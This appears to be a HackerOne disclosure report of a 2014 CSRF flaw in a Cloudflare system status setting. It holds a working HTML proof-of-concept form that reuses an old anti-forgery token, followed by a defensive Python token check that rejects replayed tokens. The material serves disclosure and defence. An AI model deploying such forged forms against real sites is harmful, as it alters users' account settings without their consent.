Cloudflare: System Status Update CSRF

2014-04-22T04:57:24
ID H1:8943
Type hackerone
Reporter chandrakant
Modified 2014-09-10T10:09:43

Description

<html>
  <!-- CSRF PoC By CK-->
  <body>
    <form action="https://www.cloudflare.com/api/v2/comm/set">
      <input type="hidden" name="k" value="comm_ea" />
      <input type="hidden" name="v" value="1" />
      <input type="hidden" name="atok" value="1398171312-878f7ba09e5dac2e4e23" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The atok token can be any old used token; it works very well.
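
A server-side check that would reject the replayed token described above, added here as an example; it is not part of the original report and not Cloudflare's code. The `timestamp-MAC` layout only mirrors the shape of the `atok` value in the PoC, and `issue_token`, `verify_token`, `SERVER_KEY` and `MAX_AGE` are hypothetical names and values.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # constructed demo key; load from a secret store in practice
MAX_AGE = 3600                        # assumed token lifetime in seconds
_spent = set()                        # redeemed tokens; a real service would use a TTL-backed store


def _mac(session_id, issued):
    """MAC over the session and issue time, so a token is useless in any other session."""
    msg = f"{session_id}|{issued}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id, now=None):
    """Return '<unix time>-<hex MAC>' bound to session_id."""
    issued = int(time.time()) if now is None else now
    return f"{issued}-{_mac(session_id, issued)}"


def verify_token(session_id, token, now=None):
    """Accept a token once, only for its own session, only while fresh."""
    now = int(time.time()) if now is None else now
    issued_s, sep, mac = token.partition("-")
    if not sep or not (issued_s.isascii() and issued_s.isdigit()):
        return False                      # malformed
    issued = int(issued_s)
    expected = _mac(session_id, issued)
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return False                      # forged, or minted for another session
    if not 0 <= now - issued <= MAX_AGE:
        return False                      # expired or future-dated
    if (session_id, token) in _spent:
        return False                      # replay of an already used token
    _spent.add((session_id, token))
    return True
```
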